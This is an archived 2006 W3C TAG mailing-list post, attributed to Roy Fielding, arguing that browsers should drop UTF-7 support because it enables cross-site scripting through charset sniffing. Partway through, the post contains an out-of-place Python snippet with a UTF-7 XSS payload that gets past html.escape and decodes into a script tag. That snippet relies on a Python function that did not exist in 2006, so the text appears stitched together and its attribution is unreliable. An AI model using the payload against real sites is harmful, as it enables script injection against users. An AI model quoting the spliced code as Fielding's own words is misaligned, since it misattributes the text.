ban the use and implementation of UTF-7 from Roy T. Fielding on 2006-12-14 (www-tag@w3.org from December 2006)

From: Roy T. Fielding <fielding@gbiv.com>
Date: Thu, 14 Dec 2006 14:13:17 -0800
To: W3C TAG <www-tag@w3.org>
Message-Id: <9CDDAFDD-245F-4770-997B-AFEB8EC06C95@gbiv.com>

Over the years I have seen a number of security exploits that make
use of broken browsers that sniff character encodings in combination
with UTF-7 encoded tags or JavaScript commands.  I have never actually
seen anyone use UTF-7 for anything legitimate (other than testing).
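
To illustrate the kind of exploit described above, here is a minimal
sketch in Python. It assumes a server that escapes output with the
standard library's html.escape and a client that sniffs the response as
UTF-7. The payload string is a hypothetical example, not taken from any
particular incident.

```python
import html

# Hypothetical attacker-supplied input, written in UTF-7.
# "+ADw-" and "+AD4-" are the UTF-7 spellings of "<" and ">".
payload = "+ADw-script+AD4-alert(1)+ADw-/script+AD4-"

# The server escapes for HTML, but the payload contains none of the
# characters the escaper looks for (&, <, >, quotes), so it is unchanged.
escaped = html.escape(payload)

# A client that sniffs the bytes as UTF-7 decodes them into live markup.
decoded = escaped.encode("ascii").decode("utf-7")

print(escaped == payload)  # True
print(decoded)             # <script>alert(1)</script>
```

The escaping step and the decoding step disagree about which characters
are significant, and that mismatch is what the attack relies on.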

Is there some reason why WWW clients need to support UTF-7?

It seems completely unnecessary given the now ubiquitous use of 8-bit
clean transports and the presence of UTF-8, which IIRC was defined
long after UTF-7.  However, the wider community may be aware of
some reason why browsers should support it, so I'd like to hear
your comments.

If there is no need for UTF-7, I'd like the TAG to consider it an
issue for the sake of asking browsers to remove its implementation
and banning its use by servers.

I know this won't solve any problems for deployed clients, and
wouldn't be an issue at all if servers used the same algorithm for
escaping characters that clients used to interpret them, but in the
long term it will simplify some checks for XSS attacks and I don't
think it will harm the Web.  That is, unless there is some significant
body of content out there that is encoded as UTF-7.

Cheers,

Roy T. Fielding                            <http://roy.gbiv.com/>
Chief Scientist, Day Software              <http://www.day.com/>

Received on Thursday, 14 December 2006 22:13:32 UTC